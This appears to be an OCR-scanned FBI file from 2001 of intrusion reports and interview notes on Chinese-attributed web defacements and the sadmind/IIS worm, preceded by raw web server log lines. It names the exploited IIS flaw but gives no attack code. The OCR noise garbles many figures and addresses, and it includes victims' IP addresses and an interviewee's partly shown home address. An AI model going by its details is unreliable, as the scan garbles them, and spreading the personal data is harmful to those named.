.146. 
.146. 
-146. 
-146. 


WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW WWW WWW WWW WWW WW WW 


GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 


/exchange/USA/Navbar/finduser.gif 304 
/exchange/USA/Navbar/public.gif 304 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/Navbar/option.gif 304 
/exchange/USA/Navbar/logoff.gif 304 
/exchange/USA/images/divider.gif 304 
/exchange/USA/images/delmsg.gif 304 
/exchange/USA/images/newmail.gif 304 
/exchange/USA/images/newpost.gif 304 
/exchange/USA/images/refresh.gif 304 
/exchange/USA/images/movepy.gif 304 
/exchange/USA/images/newfoldr.gif 304 
/exchange/USA/images/empfldr.gif 304 
/exchange/USA/images/arwtanlf.gif 304 
/exchange/USA/images/delfoldr.gif 304 
/exchange/USA/images/arwtanrt.gif 304 
/exchange/USA/images/help.gif 304 
/exchange/USA/images/mark.gif 304 
/exchange/USA/inbox/envelope.gif 304 
/exchange/USA/inbox/papclip.gif 304 
/exchange/USA/images/mffav.gif 304 
/exchange/USA/images/envelope.gif 304 
/exchange/USA/inbox/urgent.gif 304 
/exchange/USA/images/upone.gif 304 
/exchange/USA/root.asp 200 : 
/exchange/USA/images/inbox.gif 304 
/exchange/USA/Navbar/nbInbox.asp 200 
/exchange/USA/inbox/main_fr.asp 200 
/exchange/USA/Navbar/inbox.gif 304 
/exchange/USA/Navbar/cal.gif 304 
/exchange/USA/Navbar/finduser.gif 304 
/exchange/USA/Navbar/public.gif 304 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/Navbar/option.gif 304 
/exchange/USA/Navbar/logoff.gif 304 
/exchange/USA/images/divider.gif 304 
/exchange/USA/images/newmail.gif 304 
/exchange/USA/images/newpost.gif 304 
/exchange/USA/images/refresh.gif 304 
/exchange/USA/imagés/movepy.gif 304 
/exchange/USA/images/delmsg.gif 304 
/exchange/USA/images/newfoldr.gif 304 
/exchange/USA/images/delfoldr.gif 304 
/exchange/USA/images/empfldr.gif 304 
/exchange/USA/images/mffav.gif 304 
/exchange/USA/images/arwtanlf.gif 304 
/exchange/USA/images/arwtanrt.gif 304 
/exchange/USA/images/help.gif 304 
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/exchange/USA/images/mark.gif 304 
/exchange/USA/inbox/urgent.gif 304 
/exchange/USA/inbox/envelope.gif 304 
/exchange/USA/inbox/papclip.gif 304 
/exchange/USA/images/envelope.gif 304 
/exchange/USA/images/upone.gif 304 
/exchange/USA/images/inbox.gif 304 
/exchange/USA/Default.htm 304 
/exchange/USA/logon.asp 200 
/exchange/USA/back.jpg 304 
/exchange/USA/partl.gif 304 
/exchange/USA/part2.gif 304 
/exchange/USA/msie.gif 304 

/ 403 

/exchange/USA/msprod.gif 304 
/exchange/USA/logon.asp 200 
/exchange/USA/LogonFrm.asp 401 
/exchange/USA/LogonFrm.asp 302 
/exchange/USA/root.asp 200 
/exchange/USA/Navbar/nbinbox.asp 200 
/exchange/USA/inbox/main_fr.asp 200 
/exchange/USA/Navbar/inbox.gif 304 
/exchange/USA/Navbar/cal.gif 304 
/exchange/USA/Navbar/finduser.gif 304 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/Navbar/public.gif 304 
/exchange/USA/Navbar/option.gif 304 
/exchange/USA/images/newmail.gif 304 
/exchange/USA/Navbar/logoff.gif 304 
/exchange/USA/images/divider.gif 304 
/exchange/USA/images/newpost.gif 304 
/exchange/USA/images/refresh.gif 304 
/exchange/USA/images/movepy.gif 304 
/exchange/USA/images/delmsg.gif 304 
/exchange/USA/images/newfoldr.gif 304 
/exchange/USA/images/delfoldr.gif 304 
/exchange/USA/images/empfldr.gif 304 
/exchange/USA/images/arwtanlf.gif 304 
/exchange/USA/images/mffav.gif 304 
/exchange/USA/images/arwtanrt.gif 304 
/exchange/USA/images/help.gif 304 
/exchange/USA/images/mark.gif 304 
/exchange/USA/inbox/urgent.gif 304 
/exchange/USA/inbox/envelope.gif 304 
/exchange/USA/inbox/papclip.gif 304 
/exchange/USA/images/upone.gif 304 
/exchange/USA/images/inbox.gif 304 
/exchange/USA/images/envelope.gif 304 
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FD-801 (Rev. 7-15-97) 


1P/C 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/24/2001 
To: Counterterrorism Attn: NIPC, CIOS/CIU 
Room 5965 
SA b3 
b6 
ase Attn: SA b7c 
b7E 
From: Detroi 
Approved By: 
Drafted By: a4[fo2.s02) 
Case ID #: 
Title: Subject: Hacker/Honker Union of China 
Victim: Chicago Systems Group 
Type: Intrusion 
Date: 04/03/01 
SUBMISSION: OC Initial & Supplemental O Closed 
CASE OPENED: / i 
CASE CLOSED: / / 
O No action due to state/local prosecution 
(Name/Number ) 
O USA declination 
CO Referred to Another Federal Agency 
(Name/Number: ) Placed in unaddressed work 
O Closed administratively 
O Conviction 
COORDINATION: FBI Field Office: Chicago 
Government Agency 
Private Corporation 
Company name/Government agency: The Journal of Clinical Investigation 
Address/location: 35 Research Dr, Suite 300 
Ann Arbor, Michigan 48103 
Purpose of System: Mail and file server. 
Highest classification of information stored in system: N/A 
b3 


b7E 


To: A From: DETROIT . 
Re: Date 05/09/2001 se 
E 


System Data: 
Hardware/configuration (CPU): DELL, Pentium HI 
Operating System: Windows NT 4.0 service pack 5 
Software: MicroSoft HS version 4 


Security Features: 


Security Software Installed: O yes (identify ) B no 


Logon Warning Banner: [1] yes & no | 
INTRUSION INFORMATION 


Access for intrusion: & Internet connection O dial-up number [1] LAN (insider) 
If Internet: Internet address: 63.146.80.3 
Network name: www.the-jci.org 


Method: 
Technique(s) used in intrusion: MicroSoft IIS Extended Unicode Directory 
Traversal Vulnerability (also Sadminds/I{Sworm) 


Path of intrusion: 
addresses: 1. 211.97.114.240 
country: 1. China 


facility: 1. China United Telecom Corp 


Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 
Impact: 


Compromise of classified information: O yes & no 
Estimated number of computers affected: One 
Estimated dollar loss to date: $400.00 


To: A From: DETROIT 
Re: Date 05/09/2001 b3 


b7E 
Category of Crime: 
Impairment: Theft of Information: 
O Malicious code inserted O Classified information compromised 
O Denial of service O Unclassified information compromised 
1 Destruction of information/software C1 Passwords obtained 
& Modification of information/software [1 Computer processing time obtained 
C1 Telephone services obtained 
O Application software obtained 
C1 Operating software obtained 
Intrusion: 
& Unauthorized access 
C1 Exceeding authorized access 
REMARKS 
The victim site, www.the-jci.org, is only used as a mail and file 
server. 
There is no firewall which protects this server. 
found the altered files on b6 
Monday May 7,:-2001, which read "Fuck USA Government", "Fuck b7C 


Poizon BOx", and "Contact sysadmcn@yahoo.com.cn". 


+¢ 


(Rev. 08-28-2000) ® e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/06/2001 


To: Chicago Attn: IP/ 
SA 


From: Charlotte 
Squad 7, Raleigh Resident Agenc 
Contact: 


919-859-7312 
Approved By: 
Drafted By: 


Case ID #: (Pending) 
Title: HACKER/HONKER UNION OF CHINA; 
ILLINOIS SECRETARY OF STATE - VICTIM; 
INTRUSION - INFO SYSTEMS 
04/03/2001 
00: CG 


Synopsis: For information of the file, a State of North Carolina 
computer system suffered a sadmind/IIS attack. Damage determined 
to be negligible. 


Details: For information of the file, a State of North Carolina 
computer system suffered i i was 


reported on 06/01/01, by 
Foal eins of North Carolina, Information Technology 


Services. advised the attacker attempted to replace 
the default web page via the sadmind/IIS attack as documented in 
the Cert Advisory CA-2001-11. Damage was reported to be 
negligible. ; 


The attack, which occurred on 05/22/01, targeted a 
State of North Carolina computer with the IP address of: 
149.168.119.219. The attack emanated from the IP address of: 
202.204.113.13 which was reported to belong to the Beijing 
Forestry University in China. 


This information is being forwarded to Chicago for 
whatever action deemed appropriate. No further investigation 
will be conducted by Charlotte at this time. 


b3 


b7E 


To: Chicago ee @ 
b7E 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 


AT CHICAGO, IL 


Read and Clear. 


+4 


~ 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/23/2001 
To: Counterterrorism Attn: NIPC-CIU (Rm 5965) 
SS BB 
Hnicsue Attn: A b6 
b7C 
From: Washington Field b7E 
NS-18/NVRA 
Contact: SA (703) 762-3146 
Approved By: 
Drafted By: 
Case ID #: 
Title: Subject: UNSUB (S) ; 
Victim: INTER-AMERICAN DEFENSE BOARD; 
Type: INTRUSION - INFORMATION SYSTEMS | 
Date: 05/03/2001 
SUBMISSION: C Initial O Supplemental X Closed 
CASE OPENED: 05/24/2001 
CASE CLOSED: 
O No action due to state/local prosecution (Name/Number ) 
O USA declination 
C] Referred to Another Federal Agency (Name/Number: ) 
X Placed in unaddressed work 
CO] Closed administratively 
CO) Conviction ; 
COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 
VICTIM 
Company name/Government agency: Inter-American Defense Board 
Address/location: 2600 16th Street, r 
Washington, D. 20441 
b3 
——— - 
b7C 
Purpose of System: Web site b7E 


Highest classification of information stored in system: None 


To: errorism From: Washington Field 
Re: , 05/23/2001 


System Data: 


Hardware/configuration (CPU): 


Operating System: Microsoft Windows NT 4.0 _ service pack 6 


Software: IIS 4.0 


Security Features: 


Access for intrusion: X- Internet connection [0 dial-up number 0 LAN (insider) 


Method: 


Security Software Installed: yes - firewall at Organization of Amer. States 


Logon -Warning Banner: no 


INTRUSION INFORMATION 


Internet address: 
Network name: 


Technique(s) used in intrusion: 


Path of intrusion: 


Subject: 


Impact: 


addresses: 1. 2: 3. 4. 5: 
country: 1. 2. Sh 4. 5: 

facility: 1. 2. 2. 4. 5. 

Age: Race: 

Sex: Education: 

Alias(s): Motive: 
Group Affiliation: 

Employer: 


Known Accomplices: 
Equipment used: 


Hardware/configuration (CPU): 
Operating System: 


Software: 


Compromise of classified information: (1 yes X no 
Estimated number of computers affected: 2 


Estimated dollar loss to date: 


less than $500.00 


b3 
b7E 


ed @ 


To: Counterterrorism From: Washington Field 
Re: [| s,:(05/23/2001 


Category of Crime: 
Impairment: Theft of Information: 
[] Malicious code inserted C] Classified information compromised 
CO) Denial of service C] Unclassified information compromised 
QO] Destruction of information/software L] Passwords obtained 


O Modification of information/software (1 Computer processing time obtained 
C1 Telephone services obtained 
.€ Application software obtained 
[1 Operating software obtained 
Intrusion: 
X Unauthorized access 
C) Exceeding authorized access 


REMARKS 


telephonically advised the Inter-American Defense 
Board is a non-profit organization under the Organization of 
American States. They get their T-1 and support from the 
Organization of American States, but have a separate domain. 


The following information was provided on the #050401 02 41307 
Incident Report to NIPC and through telephonic contact with 
The computer is located in Building 52, Room 208A, Fort 

esley J. McNair. The intrusion occurred at 6 PM on 05/03/01. 
The computer is critical to their mission. Their Web page was 
defaced and the system's integrity. was compromised. A remark was 
left indicating the attack came from Chinese Hackers (Honker 
Union of China). There was no damage to the system. Ft. McNair 
Military Police were notified. The system was last updated on 
05/03/01 through internal sources. 


A copy of this FD-801 is being forwarded to FBI Chicago for 
inclusion in their Chinese computer intrusion effort. 
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ais 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06 / 05 / 2001 
At the_request of [sd =the UNITED STATES b3 


CAPITAL POLICE, Legislative Computer Systems, OFFICE OF b6 
THE CLERK, UNITED STATES HOUSE OF REPRESENTATIVES, furnished server Bie 


a = web pages via Internet email to Special Agent (SA)[ | Pe 


Enclosed in a 1A envelope for casef Sits a 
3.5" floppy diskette entitled, "US House of Rep. We effacement". 


Investigation on 


at Fairfax, Virginia 


b3 
File # Date dictated b6 

b7C 
by 


b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


a, 


——<——— 


.& / G 
(Rev. 08-28-2000) @ @ IK : 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/05/2001 
non/enicage net: oa] M2 
From: Washington Field ais 
NS-18/NVRA 
Contact: SA 703-762-3456 


Approved By: 
Drafted By: 


Case ID #: ending) 

Title: Subject: HACKER/HONKER UNION OF CHINA 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: Lead covered. 


b3 


b7c 
Administrative: Reference May 9, 2001 email wherein Special buE 


Agent (SA) provided SA the logs and web pages 
from victim server. erver log and web page files were 
also forwarded to SA on a 3.5" floppy diskette enclosed 
in an 1A envelope. 


Enclosure (s): [ss Fp-302 with attached 1A envelop 
containing one 3.5" floppy diskette. 


Details: On April 30,2001, the United States (US) HOUSE OF 
REPRESENTATIVES, OFFICE OF THE CLERK'S web server suffered a 
web defacement. [sd Detective, US CAPITAL POLICE b6 
notified the Federal Bureau of Investigation (FBI) of the b7Cc 
intrusion. An FD-801 detailing an intrusion was completed and 
forwarded to the Chicago FBI office. SA requested 
thatL | forward the server's log files and web pages_to 

j Field office. At the request of Detective 

of the LEGISLATIVE COMPUTER SYSTEMS GROUP, 

forwarded the server information to sa[ via Internet 
email. 


Toe: i : _ Field @ 
Re: 06/05/2001 | 
E 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO 


Read and clear. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/11/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 


From: St. Louis 


Approved By: me 
b7c 
Drafted By: b7E 


Case ID #: 


Title: Subject: HONKER UNION OF CHINA; 
Victim: City of St. Louis Water Division 


Type: Computer Intrusion 
Date: June 7, 2001 


SUBMISSION: X Initial 0 Supplemental O Closed 


CASE OPENED: __05/10/2001 


CASE CLOSED: __ 06/11/2001 (Referred to Chicago Division) 


O No action due to state/local prosecution 

(Name/Number: ) 

QO USA declination 

CO Referred to Another Federal Agency 

(Name/Number: ) 
CO Placed in unaddressed work 

x Closed administratively 

O Conviction 


COORDINATION: FBI Field Office St. Louis Division 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: City of St. Louis Water Division 
Address/location: 1640 S. Kingshighway _, St. Louis, MO 


Purpose of System: System Network for Water Division 
Highest classification of information stored in system: 


15q s.oth bé6 


b7c 


To: 4 From: St. Louis ® 
Re: Date: /2001 


System Data: 
Hardware/configuration (CPUMokia IP/440 Compag Proliant Server 
Operating System: Windows NT 
Software: Checkpoint Firewall-1, Hardened Unix 


Security Features: 
Security Software Installed: x yes (identify_Checkpoint Firewalll no 
Logon Warning Banner: [1 yes x no 


INTRUSION INFORMATION 

Access for intrusion: x Internet connection 0 dial-up number O LAN (insider) 

If Internet: Internet address: 65.64.147.130 

Network name: stlwater.com 

Method: 

Technique(s) used in intrusion: web page defacement (list 
provided) 
Path of intrusion: 
addresses: 1._202.100.26.139 2. Be 
country: 1. a 3; 
facility: 1. 2; 3. 
Subject: 

Age: Race: 

Sex: Education: 

Alias(s): Motive: 

Group Affiliation: HONKER UNION OF CHINA 

Employer: 

Known Accomplices: 

Equipment used: 

Hardware/configuration (CPU): 

Operating System: 

Software: 
Impact: 


Compromise of classified information: 1 yes X no 
Estimated number of computers affected: 1 


Estimated dollar loss to date: N/A 


b3 
b7E 


> 


To: Counterterroris From: St. Louis @ 
Te j2004 


Category of Crime: 
Impairment: Theft of Information: 
X Malicious code inserted C Classified information compromised 
C1 Denial of service CO Unclassified information compromised 


Destruction of information/software 1 Passwords obtained 
X Modification of information/software 1 Computer processing time obtained 
[1] Telephone services obtained 
1 Application software obtained 
[ Operating software obtained 
Intrusion: 
X Unauthorized access 
O Exceeding authorized access 


REMARKS 


On May 7, 2001, the City of St. Louis Water Division had 
their Web paged defaced by the HONKER UNION OF CHINA. There was 
no text printed on the black screen. Analysis of the html code 
revealed that following text was to be printed to the screen: 
"fuck USA Government, fuck PoizonBOx, contact 
sysadmcn@yahoo.com.cn". 


for the Water 
Division, opined that the text was not printed on the screen, 
because they did not use Outlook on his system. 
advised that city hall's web page was also defaced wi eé same 
html code, but the text was not printed to screen either and 
city hall does not use Outlook either. 


used a DMZ configuration for his Checkpoint 
Firewall-1 system and the logs did not_show any activity of the 
html code passing through the system. ee eomeiened that 
his ftp was not running. [ ____|zequeated SA [___Jto find out 
if any similar incidents had been reported to the FBI. sSALL__] 


telephonically the STAU Unit about the logging problem and was 
told that no other incidents had been reported. 


provided sa[__|with the following: a floppy 
diskette containing four files (two html and two asp), a one page 
log from the Checkpoint Firewall-1 system, an Internet article on 
a web page defacement_at University of Missouri, St. Louis (UMSL) 
and a e-mail from to his supervisor about the incident. 
The text message inserted in the html code was printed to the 
screen at UMSL 
15q _p3.oth. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/11/2001 


To: Counterterrorism Attn: Computer Investigations 


Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 


From: St. Louis 


b3 
Approved By: bé 
b7c 
Drafted By: : b7E 


Case ID #: 

Title: Subj ect: HONKER UNION OF CHINA 
Victim: Mary Institute and Saint Louis Country Day School 
Type: Computer Intrusion 


Date: 05/07/2001 
SUBMISSION: X Initial O Supplemental 1 Closed 


CASE OPENED: _05/10/2001 


CASE CLOSED: _06/11/2001 (Referred to Chicago Division) 
C1 No action due to state/local prosecution 
(Name/Number: ) 
O USA declination 
C1 Referred to Another Federal Agency 
(Name/Number: ) 
[1 Placed in unaddressed work 
X Closed administratively 
_O Conviction 


COORDINATION: FBI Field Office St. Louis Division 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: Mary Institute and Saint Louis Country 
Day School 
Address/location:__101 N. Warson Road, St. Louis, MO 63124 


Purpose of System: Support for Educational Structure 
Highest classification of information stored in system: N/A 


16f pt oth | 


To: Actin ae From: St. Louis 
Re( ate: © 06/11/2001 


System Data: 
Hardware/configuration (CPU): Dell PowerEdge 4400, 733MHz, PIII 
(3)18GB hard drives, 1GB RAM 
Operating System: Windows 2000, IIS 5.0 Web Server 
Software : 


Security Features: 
Security Software Installed: x yes (identify SonicWall Provx _) UO no 
Logon Warning Banner: [J yes x no 


INTRUSION INFORMATION 


Access for intrusion: x Internet connection [1 dial-up number 11 LAN (insider) 


If Internet: Internet address: 206.187.18.237 (public) 
Network name: mail.micds.org 


~ Method: 
Technique(s) used in intrusion: _web page defacement (list 
provided) 
Path of intrusion: 
addresses: 1.137.241.140.239  2._210.122.218.237 3. 
country: 1. 2: 3. 
facility: 1. 2; 3: 
Subject: 
Age: Race: 
Sex: Education: 
PUES (SY E ocr igist tte Sai aise aces no IOUS 
Group Affiliation: HONKER UNION OF CHINA 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 
Impact: 


Compromise of classified information: O yes X no 
Estimated number of computers affected: = a 


Estimated dollar loss to date: _UNK 4hrs. of sys admn time 


b3 
bTE 


To: ee. From: St. Louis 


Re: Date: 06/11/2001 
Category of Crime: 
Impairment: Theft of Information: 
x Malicious code inserted O Classified information compromised 
O Denial of service O Unclassified information compromised 


O Destruction of information/software 1 Passwords obtained 
x Modification of information/software C1 Computer processing time obtained 
OC Telephone services obtained 
O Application software obtained 
1 Operating software obtained 
Intrusion: 
x Unauthorized access 
C1 Exceeding authorized access 


REMARKS 


On May 7, 2001 and May 10, 2001, a public web server at 


Mary Institute and Saint Louis Country Day School(MICDS) was 
attacked. The server was running Windows 2000 Service Pack 1 and 
Iis 5.0. The DNS was mail.micds.org. 

at MICDS, applied new patches to Fix e problem on 
5/7 and again on 5/10. , 


The text in the HTML code was consistent with other web 
defacements. The text was "Fuck USA Government, Fuck PoizonBOx, 
contact sysadmcn@yahoo.com.cn" 


; 


attempted to send e-mails to the hosts which 
appeared on the logs, but all attempts at communication bounced. 

was running a variety operating systems in addition to 
Win2K to include Solaris and Linux. 


[was notified by the Technology Department about 
the defacement on 5/7 and by the Business Department on 5/10. 
[—S—sdJdeleted all the files which were modified and redirected 


the web page. [/ __—sdjrecreated the web page. 


supplied a floppy diskette to sal with the 
log activities from the attack. 


| 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/04/2001 


2100 Edgeland Avenue #2, Louisville, 


Kentuck 40204, cellular telephone number 
hs a) Social Security Account Number 


was interviewed at his place of employment, Choice Systems, Inc., 
9960 Corporate Campus Drive, Suite 100, Louisville, Kentucky, 
40202, telephone number 502-357-6300, extension[  ] where he is 
employed as al ——s—s—CC. | ©AEteY being advised of the 
identity of the interviewing Agent and the purpose of the 
interview,[ _] provided the following information: 


stated he sent all available logs of the attack 
to Special Agent (SA) in Washington, D.C. 
several weeks ago. explained the cost of the attack was 
negligible and that it only affected Choice Systems’ web server 
which is their commercial site. According to the log file, the 
main server was compromised on May 4, 2001 and was registered 
under IP address of 208.141.14.245. The upstream Internet 
provider for this server was Confluent Web Systems. 


stated the other system compromised was a backup 
server for the commercial server. The log file for the backup 
server indicated that the system was compromised earlier on 
February 23, 2001. The IP address of this server was 
202.97.205.4. The upstream Internet provider for this server was 
Blue Star.Net. 


[J concluded by stating the only way the compromise 
of this attack was noticed was when the main commercial server 
was attacked by the Chinese web page defacement. While restoring 
the web page, the other infiltration was noticed. While 
investigating this intrusion, stated one of the scripts 
used referenced a site in California. stated after this 
discovery, he was contacted by SA 


provided the interviewing Agent with copies of 
all the logs he still had in his possession. 


Investigationon 06/01/2001 at Louisville, Kentuck 


Date dictated 06/04/2001 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 


it and its contents are not to be distributed outside your agency. 
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Da ee 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/11/2001 


On June 11, 2001, Detective | _oregon 
State Police_(OSP 3710 Portland Road Northeast, Salem, Oregon, 
provided 2A eR the following reports, via US Mail, 
related to China originated web site defacements: 


1. OSP Incident Report 01227855, dated May 22, 2001, for 
victim, Construction Contractors Board. , 


2. OSP Incident Report 01227857, dated May 25, 2001, for 
victim, Department of Environmental Quality. Enclosed with this 
report are two floppy diskettes containing the server logs of the 
victimized machine. 


3. OSP Incident Report 01227869, dated May 23, 2001, for 
victim, Oregon State Police - ID Services. Enclosed with this 
report is one floppy diskette containing the Internet files 
believed to have been uploaded to the ID Services server. 


All original reports and diskettes are being placed into 
1A envelope's, and will be furnished to Chicago for potential 
prosecution. 


Investigation on 


June 11, 200% Hillsboro, Oregon 


Date dictated 


File June 11, 2001 


by 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/11/2001 

To: Counterrorism Attn: Computer Investigations Unit, 
CIOS, NIPC 
SSA b3 
SSA b6 
Room 11719 b7c 


b7E 
Ygfscase sal 


From: Portland 
Squad 4 
Contact: 


Approved By 

Drafted By: 

Case ID #: 

Title: HACKER/HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
INTRUSION 


Synopsis: Furnish Chicago with web defacement incident reports. 


Enclosure(s): Enclosed for Chicago is the original and one copy 
of an FD-302, for the interview of Oregon State Police (OSP) 


Detective|___] Also enclosed are the 1A envelopes b6 


containing the original OSP incident reports and computer y b7C 
diskettes. 


Details: Pursuant to telephone calls between sal and SA 
Portland is providing Chicago with reports of 
the following China originated web site defacements: 
On June 11, 2001, Oregon State Police (OSP) Detective 
furnished Portland with 3 Incident Reports 
detailing web site defacements at the following businesses: 
1. Oregon Department of Environmental Quality 


2. Oregon Construction Contractors Board 


3. OSP ~ ID Services 


To: ri .o.. Portland © 
Re: 06/11/2001 


Detective[___]also furnished computer diskettes 
containing data from the compromised machines. 


Portland will continue to provide Chicago with China 
based web site defacement reports, as they are received. 
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FEDERAL BUREAU OF INVESTIGATION | \ 
Precedence: ROUTINE Date: 05/31/2001 
To: vChicago VAttn: sa[ Be 
Philadelphia b6 
b7C 
om: Philadelphia Hie 
Squad 9 
Contact: SA 215-418-4313 
Approved By: 
Drafted By: 
Case ID #: 
(Pending) 
Title: Honkers Union of China; 
Chicago Systems Group- Victim; 
Intrusion- Other 
Synopsis: Claim statistical accomplishments. 
Details: Philadelphia FBI has received several complaints and 
have identified the following victims concerning the above 
captioned Chicago investigation. Below is a list of victims of 
the web defacement attack identified in the Philadelphia FBI 
territory since May 18, 2001: 
1.) MAC DIRECT c/fo[ b6 
185 Discovery Drive _b7C 


r 18915 
(cell) 


2.) MORAVIAN COLLEGE c/o 
120 West Greenwich Street 
Bethlehem, PA 18018 


3.) PALISADES SCHOOL DISTRICT c/o[ 


39 Thomas Free Drive 
Kintnersville, PA 18930 
(610) 847-5131 ext. 


4.) SOLUTION SYSTEMS INC. cfo[ 


114 Forest Avenue 
Narbeth, PA 19072 


b3 
b7E 


To: Chicago, Philadelphia From: Philadelphia 
re: [05/31/2001 


5.) CONCORDE INC. c/oL_____— 


1835 Market Street 
12th Floor 


ehitadeiphia, 2h 19103 


.) UNIGLOBE/WINGS TRAVEL col sd 


6198 Butler Pike 


aeees 


) weutRowzes Inc. c/ol *d 


TOPLINK INC. c/o 
103 East Pennsylvania Blvd. 
Festerville, PA 19053 


9.) CRW GRAPHICS INC. c/o 


9100 Pennsauken Highway 
Pennsauken, NJ 08110 


aaa 


10.) DILWORTH PAXSON, LLP cof 
1735 Market Street 


paises PA 19103 


11.) LANCASTER GENERAL HOSPITAL cof 


12 


13 


14 


15 


.) PHILADELPHIA UNIVERSITY of 
.) VILLAGEAUCTION.coM c/ol 


200 Innovation Blvd. 


—— Park, PA 16803 


.) CIBER c/o 


650 Wilson Lane 


——— PA 17055 


.) PointAll Corporation cof 


950 Tilton Road 
Northfield, NJ 08225 


b3 
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b6 
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b6 
b7Cc 


j j iphia From: Philadelphia e 
05/31/2001 b3 
b7E 


(609) 641-7500 ext. [| bé 


16. 


17. 


18. 


19. 


20. 


21. 


22. 


23. 


24. 


25. 


) 


) 


) 


b7C 


s Solutions, Inc. col 


710 Floral Vale Blvd 


RE PA ae 
Prince Law Offices cfol sd 


42 South 5th Street 
Reading, PA 19602 
(610) 375-8425 


Miller's Capital Insurance cof | 
805 North Front Street 
Deloitte Consulting Group cfo[ 


3600 Vartan Way 
Harrisburg, PA 17110 
(717) 651-2858 ext 


APR Supply Company c/ol_———sd 
305 North 5th Street 
Lebanon, PA 17022 


Commonwealth of Pennsylvania cefol ee 


Commonwealth Technology Center 
1 Technology Park 


(ees PA 


Na Depot 
Te Criminal Investigative Service) 


Pennsylvania State University c/o 


Harrisburg Campus 
Harrisburg, PA 


Strafford Mechanical, Inc. c/o zz 
37 Industrial Blvd. 


Paoli, PA 19301 


Adis International Inc. c/fol 


820 Town Center Drive 


To: Chicago, Philadelphia From: ists 
res [05/31/2001 bs 


b6 
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Langhorne, PA 19047 


To: Chicago, Philadelphia From:. pace ae 
re: [05/31/2001 


Accomplishment Information: 


Number: 25 
Type: NIPCIP VICTIM CONTACTED / INTERVIEWED 
ITU: NIPCIP 


Claimed By: 
Name: 
Squad: 9 
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TO% iladeiphia From: cies © 
Re: 05/31/2001 


LEAD (s) : 


Set Lead Ls 
CHICAGO 


AT CHICAGO, ILLINOTS 


For information purposes. Read and clear. 


Set Lead 2: 
PHILADELPHIA 
, AT PHILADELPHIA, PENNSYLVANIA 
Read and clear. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/31/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 
Computer Investigations 
and Infrastructure Threat 
Assessment Center 


(CID/NSD) 
From: SAC, Seattle 
Squad 11 
Contact: tos[ «| (208) 262-2438 =: 


b7c 
Approved b7E 
Drafted By: 
Case ID #: 
Title: Subject: UNSUB; : 
Victim: LUMMI INDIAN BUSINESS COUNCIL; 
Type: SADMIND/IIS WORM; 
Date: 05/14/01 
SUBMISSION: <X Initial MO Supplemental O Closed 
CASE OPENED: 05/31/01 
CASE CLOSED: 
[11 No action due to state/local prosecution (Name/Number ) 
[] USA declination 
[1] Referred to Another Federal Agency (Name/Number: ) 
X Placed in unaddressed work 
Oh Closed administratively 
O Conviction 
COORDINATION: FBI Field Office Chicago 
Government Agency 
Private Corporation 
VICTIM 
Company name/Government agency: bs | 
Address/location: 2616 Kwina Road ome 
Bellingham, WA., 98226 Bae 


Purpose of System: Web Site 
Highest classification of information stored in system: Unclass. 


[| 


TO: ee From: SAC, Seattle @ 
ne: ] 05/31/2001 


System Data: 
Hardware/configuration (CPU): 


Operating System:__ Windows NT/Service Pack 6 with IIS 


Software: 


Security Features: 
Security Software Installed: X yes (if yes, type) UO) no 


Symantic Norton Anti Virus Software 
Logon Warning Banner: UO yes U no 


INTRUSION INFORMATION 


Access for intrusion: xX Internet connection MO dial-up 
number OJ LAN (insider) 
If Internet: 169.203.16.2 (Lummi Nation IP addresses) 


Network name: 
Method: 
Path of intrusion: 
addresses: 1. 207.71.87.60 


country: 1. USA 
facility: 1. Verio, Inc 


Subject: UNSUB 


Age: Race: 

Sex: Education: 
